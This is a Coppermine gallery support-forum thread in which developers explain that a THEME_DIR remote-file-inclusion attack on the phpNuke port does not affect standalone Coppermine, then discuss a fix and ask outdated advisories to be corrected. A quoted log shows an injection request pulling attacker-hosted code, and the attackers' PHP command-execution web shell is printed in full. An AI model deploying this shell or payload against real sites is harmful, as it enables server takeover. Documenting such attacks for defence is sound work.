Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: Possible security threat does NOT apply to coppermine standalone  (Read 14380 times)

0 Members and 1 Guest are viewing this topic.

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47844
  • aka "GauGau"
    • gaugau.de

DeadKenny reported continues attacks on his coppermine standalone install that all failed
Quote from: DeadKenny
It seems some guys (adolescent jerks) in Brazil are trying to hack my Coppermine.

First I get a bunch of web server entries like this...

200.177.162.14 - - [20/May/2004:08:55:13 +0100] "POST /modules/coppermine/themes/default/theme.php HTTP/1.0" 404 328 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:14 +0100] "POST /modules/coppermine/include/init.inc.php HTTP/1.0" 404 324 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:15 +0100] "POST /modules/coppermine/themes/coppercop/theme.php HTTP/1.0" 404 330 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:16 +0100] "POST /modules/coppermine/themes/maze/theme.php HTTP/1.0" 404 325 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:17 +0100] "POST /modules/My_eGallery/public/displayCategory.php HTTP/1.0" 404 331 "-" "Mozilla 4.0 (Linux)"

Which fail miserably because I don't have coppermine in any normal path nor do I use CPGNUKE.

and then I get this...

200.103.127.12 - - [21/May/2004:04:53:29 +0100] "GET http://************//modules/coppermine/themes/default/theme.php?THEME_DIR=http://failiture.webcindario.com/rf.txt?&cmd=id HTTP/1.0" 404 329 "http://************//modules/coppermine/themes/default/theme.php?THEME_DIR=http://failiture.webcindario.com/rf.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Again fails thanks to where I keep coppermine.

I have this on two virtual hosts and from a mixture of IP addresses all resolving to .br domains.

He then reports of a theme dir hack that is supposed to make coppermine vulnerable
Quote from: DeadKenny
Interestingly the THEME_DIR hack is a script allowing some kind of back-door access to your system...
Code: [Select]
<br><font face="verdana" size="2"><center><b>CMD</b> - Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture<br></center></font>
<font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Released by : <b>Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture</b><br>
<br>
<br>
<hr color="black" width=751px height=115px>
<br>
<pre><font face="Verdana" size="1">
<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
<br>
<hr color="black" width=751px height=115px>
<br>
<font face="Verdana" size="1"><b>#RF</b><br><b>@ </b>irc.brasnet.org<br><b># </b>
www.rfcrew.com.br</font><br><b>#</b></font><font face="verdana" size="1"> Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture ::
</font></p>
I did a search on these jerks and all that came up is a large number of sites these idiots have defaced and proudly proclaim they "ownz" them  

I assume people here are aware of this vulnerability?

We (the coppermine dev team) had a look into this - all users of coppermine standalone (with or without bbs integration) can rest assured: the vulnerability does NOT apply to any coppermine standalone version!

Details:
  • our theme files have only functions and variables (no post processing or includes, etc)
  • $THEME_DIR variable is initialized each time from within init.inc.php, which would lead me to think this attack would only work on CPG standalone if we had a file using the templating system to generate output without making an 'in Coppermine' declaration. Even then, the call to init.inc.php should overwrite the $THEME_DIR variable with the correct value
  • 'THEME_DIR' in the theme.php file doesn't even read the GET variables, and is encapsulated. In init.inc.php we have the IN_COPPERMINE check plus it checks to see if 'THEME' is a valid directory, not 'THEME_DIR'
We just wanted to point this out in case someone reads the name "coppermine" on SecurityFocus - they are reporting the CPGNuke problems as Coppermine problems, which is not the case.

GauGau
-Coppermine project manager-
Logged

DeadKenny

  • Coppermine novice
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 40
Re: Possible security threat does NOT apply to coppermine standalone
« Reply #1 on: June 16, 2004, 03:19:16 am »

Cheers. Thanks for looking into that, I can rest easy now (though with 'modules' in the path I did wonder as coppermine standalone doesn't have that) :)
Logged

cerberus

  • Coppermine novice
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 46
    • Pocket PC Russia
Re: Possible security threat does NOT apply to coppermine standalone
« Reply #2 on: July 18, 2004, 07:02:49 pm »

Coppermine is almost bulletproof ;)
Logged
With Best Regards, Cerberus
Edamus, bibamus, gaudeamus.
http://www.pocketpcrussia.com - My Main Site

timdorr

  • Coppermine newbie
  • Offline Offline
  • Posts: 1
Re: Possible security threat does NOT apply to coppermine standalone
« Reply #3 on: September 15, 2004, 08:10:47 pm »

Just FYI for the PostNuke/PHPNuke integration users out there, this was exploited on one of my systems recently. Since no one seems to be giving a fix, here's what you add:

if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');

Just pop that above the global $template, $template_display_picture, $template_image_comments, $template_add_your_comment; line in the modules/coppermine/themes/*/theme.php files and it fixes the security hole.
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47844
  • aka "GauGau"
    • gaugau.de
Re: Possible security threat does NOT apply to coppermine standalone
« Reply #4 on: September 15, 2004, 11:48:51 pm »

Urm, just to make this clear: the board you're posting on doesn't deal with the nuked version of coppermine, only the standalone. We have this existing post to point out that the standalone (and that's the only version we can talk about on this board) is not affected by all those bug reports that float around on the internet, warning people not to use coppermine. Those people should more correctly warn not to use phpNuke at all.
Those who cursory read this thread might get the impression that standalone coppermine was affected, which is not the case - timdorr's posting was meant OK, he was trying to help others, but this board is the wrong place for it - better post it on nuke-related sites.

Joachim
Logged

ecto

  • Supporter
  • Coppermine frequent poster
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 144
    • My very incomplete gallery
Re: Possible security threat does NOT apply to coppermine standalone
« Reply #5 on: December 20, 2005, 02:19:12 am »

Old thread, I know, but here's some new news.

"Mambo, Coppermine and PHPBB Attacks"

"The attacks have a similar mechanism to the previous awstats and xmlrpc.php attacks that we recorded a few weeks ago, which exploits the input validation vlnerability of the said applications to inject code that then downloads a malware called "listen", very similar to lupii malware."
http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17

I don't want to start flaming Mr. Talabis (the author) yet, as I haven't looked that closely at the code myself, but I guess his claim that Coppermine is vulnerable to this attack is as invalid as it was over a year ago.
Logged

Nibbler

  • Guest
Re: Possible security threat does NOT apply to coppermine standalone
« Reply #6 on: December 20, 2005, 02:28:41 am »

It's about as invalid as you can get - the file that is supposed to have the vulnerability does not exist in Coppermine standalone.
Logged

ecto

  • Supporter
  • Coppermine frequent poster
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 144
    • My very incomplete gallery
Re: Possible security threat does NOT apply to coppermine standalone
« Reply #7 on: December 20, 2005, 02:49:49 am »

Heh, of course.. should have seen that one :) And even if it did exist in that directory, it wouldn't be vulnerable.

I sent Mr. Talabis a mail about it, hopefully he'll update the article to avoid worsening Coppermine's reputation.
Logged

ecto

  • Supporter
  • Coppermine frequent poster
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 144
    • My very incomplete gallery
Re: Possible security threat does NOT apply to coppermine standalone
« Reply #8 on: December 20, 2005, 04:32:00 am »

I got a response from Mr. Talabis, and he referenced to http://secunia.com/advisories/11524/ .  Maybe one of the devs could contact Secunia to update that page, as people obviously still use it for reference, even though it's been 1,5 years since it's posting and it still says "Solution Status: Unpatched".

Mr. Talabis suggested that he could update the article and mention that the vulnerability does not apply to the current CPG version, and I kindly asked him to do so.
Logged

Nibbler

  • Guest
Re: Possible security threat does NOT apply to coppermine standalone
« Reply #9 on: December 20, 2005, 05:00:32 am »

Email sent to Secunia.
Logged

ecto

  • Supporter
  • Coppermine frequent poster
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 144
    • My very incomplete gallery
Re: Possible security threat does NOT apply to coppermine standalone
« Reply #10 on: December 20, 2005, 05:17:34 am »

Mr. Talabis has updated the article now, but it only states that the current version isn't vulnerable to the attack mentioned. I'd like to know from what version that vulnerability is fixed, so I can tell him to update the article accordingly, and so that people reading it will know if they have an urgent need to upgrade or not.
« Last Edit: December 20, 2005, 05:24:29 am by ecto »
Logged
Pages: [1]   Go Up
 

Page created in 0.023 seconds with 20 queries.